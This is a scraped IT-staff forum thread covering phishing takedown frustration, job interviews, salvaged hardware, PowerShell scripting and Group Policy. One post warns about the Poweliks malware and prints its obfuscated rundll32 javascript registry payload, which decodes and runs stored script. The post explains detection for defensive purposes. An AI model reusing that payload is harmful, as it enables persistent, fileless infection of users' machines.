WTF can I do with this?

1. Phishing email went to all my users.

2. I contacted web host where phishing page is. No response. It's a fake hosting company that exists entirely to host phishing, spam, etc.

3. I contacted registrar. Same thing. No response, and looks like they handle fake shit.

4. I contacted ICANN:
ICANN has reviewed and closed your complaint because:

- This complaint is only for registrars under the 2013 Registrar Accreditation Agreement (RAA). Registrars under the 2001 or 2009 RAA do not have to comply with this requirement. To determine which RAA version applies to a registrar, visit the ICANN-Accredited Registrars page at http://www.icann.org/registrar-reports/accredited-list.html, which lists the RAA version for every registrar.

ICANN considers this matter now closed.
WTF can I do? Sic anon on them? Wouldn't know how.

this be good for IT guys

next time you work on some fools computer use this site:

http://hackertyper.net/

make them think you're doing some crazy over the top complicated stuff to fix their computer

It would probably work best on people who have simple issues to fix(a cord unplugged or frozen screen) because those people are clearly stupid enough to believe you're really doing something.

theholycow

For confidence, try not to imagine that the stakes are high. I got my current job because I was relaxed and friendly and even a little jokey at the interview -- because, honestly, I did not believe that the position existed. I thought it was going to be completely nothing like I was told, or it was going to be a scam or something. I showed up and just chilled with the folks who were interviewing me, chatted, etc. I was honest and casual, even when they asked me about my weaknesses -- I told them that I procrastinate (though I did say I do better at work than at home).

Also, my boss has a name similar to a celebrity and instead of making the same dumb jokes that most people would make I asked him if he has a problem with people making the same dumb jokes over and over like Michael Bolton in Office Space. He appreciated that, and I'm sure it made me stand out and be memorable.

VmaxEngage
04-28-2014, 06:56 PM
lol office space is awesome.

Last interview I went to I feel like I was pretty relaxed, it was a local company here, Cables n Kits. They said I was over qualified (was a warehouse/packing position) and that if they ever needed someone extra on the cisco testing/refurbishing side they would call me back.

Maybe I should get in touch with them again :hmm:

stonehenge
04-28-2014, 06:59 PM
Definitely be relaxed and talkative. On the hiring committees we would pick people that we felt would fit in and get along with everyone. We'd pick the guy who needed a little training but was funny and honest vs the guy who k new everything and was a cocky douche. Lol

- Audio ports don't sense when headphones are plugged in or removed (bad for pr0n) but can be manually changed.

If the total space used on all three is small enough, I'm just going to make them into three .iso files and throw them onto one HD. If they are too big and require actual compression, do any of you have any decent program recommendations to compress the entire contents of an HD for free? Did a side jerb with a friend. This place wanted us to pull hard drives and recycle/trash the computers because they're old/slow. As we were pulling HDs we noticed that three were i5s, half shipped w/ w7 and are nice, and the slowest of them are core2 duos. All are HP desktops. Three of the C2Ds are bamf compact boxes with WiFi.

These were used for browser/office/email, they didn't need replacing. But that's not our decision. :smileshrug:

Needless to say, I now have a little mini Core2Duo with WiFi and an i5 to play with, as does my buddy, and we have like 15 other boxes that we may sell/give to peeps instead of trashing/recycling lol

I've never had it disconnect because I used it for too long :chin: and I've had it connected for long periods of time.

It does say "Thank you for being fair." when you disconnect because you're using the free version and it wants to remind you that you should pay for commercial use. AFAIK there are no limitations on the free version except for the commercial/private usage so you should be able to reconnect if they've added a timeout.

As for encryption, I honestly haven't looked into it. I haven't used it for anything too vital yet.

OIC. Left it overnight and it said "Thank you for being fair." when I looked again in the morning, just figured it timed out but probably just lost connection. Come to think of it, host got rebooted.

Yeah, then that was just the standard "thx bro, i trust that you aren't using this for bidness :suspicious :" message.

Compaq Craptop power brick might work for the lil hp. :chin: except it is 18.5v instead of 19.5v so it might not be enough. We'll see.

If polarity is ok and connector fits, it should be fine. 1 volt difference will likely not even be noticed by the machine, and hopefully there's sufficient amps to run it.

That's what I'm hoping. Will try later. It looks like the right connector but could be slightly different.

User: It's slow copying folders to my personal drive on the server.

J: Orly? No one else has mentioned issues so the server is fine. [DesktopTech] says that your network speeds are fine when he tested them earlier. Does it happen in every folder on your drive?

U: Well, it happens when I copy files into the Old Laptop folder on my drive.

[investigating intensifies]

J: Well, you have over 1500 files in that folder... I'm thinking you just have too many files in one place and you're timing out while trying to load that directory. Can you split them into multiple folders so we can see if that helps? I can split them into a few directories for you if you don't mind me just splitting them up alphabetically.

U: Just delete them all. :)

J: :suspicious:

U: Go ahead, I have copies in the NewMacFiles folder!

Sorry, Cez is pretty much right. There aren't really entry-level positions for Info Sec or other IT specialties. If you get really lucky you might score an entry level junior system administrator position, but then you should play the lottery too. Most in IT start as something like a helpdesk support specialist, then move on to their preferred specialty or an intermediate position.

Am talking to a company about a associate system admin position at the moment, BlueWave Computing

theholycow
08-06-2014, 04:43 PM
I've seen that company name before, it reminded me of this:
https://en.wikipedia.org/wiki/Blue_Wave
It was an offline reader for BBS posts. Imagine if you had a 2400 baud modem and wanted to read hundreds of AOT posts but AOT could only have one user at a time...download those messages, then read them at your leisure, write your replies, and upload those as a batch.

Instead of sigs, taglines were common. Bluewave could add them randomly from a text file and came with a default set of humorous ones. One of them was "She'll be having fun fun fun 'til her daddy takes her cucumber away."

I'm inherently lazy. Like, "I want a bottle of water, but it's all the way over there, so I guess I'll just dehydrate" style lazy.

Our server room is maybe, MAYBE, 50 feet from my desk. But I've got to go around a wall and unlock two doors, disable an alarm system, fight a dragon, and then find the machine I want to administer. Ain't nobody got time for that.

To make sure that I can maintain my standards of laziness, we have remote management available for all of our servers. Since we're a Dell shop, that consists of DRAC , the Dell Remote Access Controller (with the Enterprise license for remote console).

In the past, these have been of questionable quality and perhaps I have, on occasion, called into question the marital status of the DRAC's mother, but we seem to have settled into an uneasy truce where I try to do things, and it continually tells me no until I ask nicely enough.

Virus alert...

New virus named Poweliks has some very novel strategies, gets new versions faster than the community can keep up, and can be very difficult to remove if you don't get to it soon enough.

Although initial infection vector is a file, probably a MS Word file in a fake "UPS package for you" type of email, once it's in you can remove EVERY infected file and still be infected because it infects the registry...and not just the usual places in the usual ways. It uses malformed key names to make it impossible to see or remove in regedit, and it places itself in various areas that you never knew would run stuff.

And what exactly does it place in the registry, you ask?
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktdsjqu/fodpef?(,)ofx!BdujwfYPckfdu)(XTdsjqu/Tifmm(**/SfhSfbe)(ILDV]]tpguxbsf]]dmbttft]]dmtje]]|bc9:13c5.1:db.5cc7.c89e.b9g6:18:b9e6~]]mpdbmtfswfs43]]b(*,(=0tdsjqu?(*".replace(/./g,function(_){return%20String.fromCharCode(_.charC odeAt()-1);})) -Embedding
:whoa: What that jumble of obfuscated code does is fail out of one intepreter after another, leaving just enough valid stuff along the way to prevent errors, and eventually it gets to run stuff.

Here's more on that crazy command line: http://stackoverflow.com/questions/25131484/rundll32-exe-javascript

And here's one article on Poweliks in general: https://blog.gdatasoftware.com/blog/article/poweliks-the-persistent-malware-without-a-file.html

First indication that you are seeing it might be tons of Rundll32's with no parent process. If you view the TCP/IP tab for their properties dialog box in Process Explorer, you'll see they're connecting to tons of random shit, obviously playing remote control zombie. They chew up the CPU and respawn when you kill them. You might also see Powershell processes, which open momentarily to spawn them.

---------- Post added at 07:01 PM ---------- Previous post was at 07:01 PM ----------

In other news, speaking of Process Explorer, the latest version has an awesome new feature: VirusTotal.com integration. Turn it on in the menu and you get a column for it. Procexp makes hashes of every file it sees and checks those hashes against VirustTotal.com's awesome service (which checks files against 55 different virus scanners).

dat powershell :insane:

Made a script that pulls in a list of users/depts from a text file. It creates a home directory for the user in the proper departmental subfolder, gives them full access and ownership to the new folder, removes my access from the folder (which gets added when I create it), and puts them into a group based on their department.

This should save me time in the future. It's too bad I can't just use the Profile tab in their user account to have all that done automatically. :pissedfist:

Fuck n A. Powershell is confusing as hell. Never used it before, never made any scripts.

We do have N-Able at work and it has a script automation tool that makes scripting pretty damn easy. just drag n drop

stonehenge
12-13-2014, 12:29 AM
bash and batch scripting is pretty easy, you are basically just listing commands you want to run and putting them into for loops with variables and whatnot

powershell is like a full on programming language, it is object orientated and shit. It's pretty powerful if you learn how to use it but :insane: lol

I got it all working how I wanted so that's nice.

any of you have a Group Policy that will limit a group of users so that they have admin access when logging into workstations and can join/remove from the domain, but they can not log into servers or modify group policy, users, etc?

We used to have a linux domain and we're moving to Windows and changing allthethings. I'll figure it out either way but if any of you have a policy that works well, I can haz a look at it? :chuy:

I don't think we do. There's only like 3-4 people who can change any GP stuff. I'm sure as hell not one of them yet

Might have a job offer from www.versprite.com
One of my professors worked for them, so I know they are legit as fuck. I would go crazy for the chance to get into security consulting.

wat

I thought I posted a reply. Well, here it is again.

Add users to a group. Give that group "Deny" permissions for logging into servers.

Possibly use "Delegate Control" function.
http://windowsitpro.com/active-directory/view-remove-ad-delegated-permissions

At my work we just manually grant local administrator permissions to specific users on their usual computers and we do all the join/remove from domain operations. (Actually, any local admin can remove from domain, even without any domain admin privilege.)

stonehenge
01-18-2015, 02:12 AM
Well we'll use local accounts for admin access for users. I'm thinking of accounts for desktop techs, web developers, etc that will/might need admin access but we don't want them to get into GP or anything.

Will investigate that link on Tuesday.
